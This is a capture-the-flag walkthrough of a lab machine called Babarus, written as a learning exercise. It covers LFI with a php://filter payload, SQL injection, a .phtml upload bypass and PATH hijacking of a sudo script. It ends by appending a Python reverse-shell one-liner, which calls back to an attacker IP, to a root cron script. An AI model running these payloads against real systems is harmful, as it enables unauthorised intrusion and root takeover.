Babarus Writeup | babarospwns.cc

babarus_writeup.md

Difficulty: Medium | Category: Web

Babarus is an excellent box that tests your enumeration skills, understanding of web vulnerabilities, and ability to abuse Linux system misconfigurations. It's my first CTF, and all feedback and thoughts are welcome, drop'em here: csamarok@babarospwns.cc. Let's dive in.

[+] Task 1 — Initial Access & Web Exploitation

Enumeration

We start with a standard Nmap scan to see what ports are open on the target machine.

nmap <MACHINE_IP>

The scan reveals that port 80 (HTTP) is open, hosting the Babarus employee portal.

Local File Inclusion (LFI)

Navigating through the web portal, we notice the URL structure uses a parameter to load different pages (e.g., ?page=status.php). This is a classic indicator of a potential Local File Inclusion vulnerability. We can test this by attempting to read internal system files.

Because simply including PHP files will execute them, we need to use a PHP wrapper to encode the source code into Base64 so we can read it on our screen:

http://<MACHINE_IP>/index.php?page=php://filter/convert.base64-encode/resource=login

Decoding the Base64 output reveals the backend code structure.

SQL Injection (SQLi)

Further enumeration reveals an endpoint interacting with the database. We can test for SQL Injection by capturing the request and using SQLMap on it.

This successfully dumps the database which contains 2 users UnderVenice & JammerDinos and the MD5 Hashes of their passwords. Cracking the first hash via CrackStation or Hashcat reveals the password.

Bypassing the Upload Filter

With credentials in hand, we access the portal that allows file uploads for the profile picture. The application attempts to block malicious files by filtering out the .php extension. However, Apache is misconfigured to execute alternative PHP extensions.

We rename our standard PHP reverse shell from shell.php to shell.phtml, upload it, and navigate to the uploads directory. We catch the reverse shell on our netcat listener.

nc -lvnp 4444

We now have a shell as the www-data user. so we grab the web flag. THM{WEB_FLAG}

[+] Task 2 — Lateral Movement

Our first goal is to escalate to a standard user account. Checking our basic privileges with sudo -l yields interesting results:

Matching Defaults entries for www-data on babarus:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on babarus:
    (dev_venis) EXTENV: NOPASSWD: /opt/maintenance/cleanup.sh

We can run cleanup.sh as the user dev_venis without a password. Let's inspect the contents of the script:

cat /opt/maintenance/cleanup.sh

Inside the script, we notice it calls the gzip command using a relative path rather than an absolute path (/bin/gzip). This makes the script vulnerable to PATH manipulation.

PATH Hijacking

We can create a malicious executable named gzip in our current directory, add it to our PATH, and force the script to execute our payload instead of the real gzip binary.

cd /tmp
echo "/bin/bash" > gzip
chmod +x gzip
export PATH=/tmp:$PATH
sudo -u dev_venis /opt/maintenance/cleanup.sh

The script runs, calls our fake gzip, and drops us into a shell as dev_venis. We can now claim the user flag.

                        THM{USER_FLAG}

[+] Task 3 — Privilege Escalation

Now that we are dev_venis, we need to find a path to root. Running the id command shows that our user belongs to an unusual secondary group:

uid=1000(dev_venis) gid=1000(dev_venis) groups=1000(dev_venis),1001(system-monitors)

We can search the file system for any files owned by this custom group:

find / -group system-monitors -type f 2>/dev/null

This reveals a python script: /usr/local/scripts/healthcheck.py. By monitoring background processes using a tool like pspy, we discover this script is running as a hidden cron job executing as root every minute.

Abusing Writable Cron Jobs

Checking the file permissions (ls -la) shows that the system-monitors group has write access to the script. We can simply append a reverse shell payload to the end of the python file.

echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("YOUR_VPN_IP",4445));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' >> /usr/local/scripts/healthcheck.py

We set up a new netcat listener on port 4445, wait less than a minute for the cron job to trigger, and we receive our root shell!

root@babarus:~# cat /root/root.txt

                        THM{ROOT_FLAG}

[+] Conclusion

Babarus highlights the dangers of insufficient input validation leading to LFI and SQLi, the importance of explicit file extensions in upload filters, and why developers must always use absolute paths in scripts running with elevated privileges.

cd ../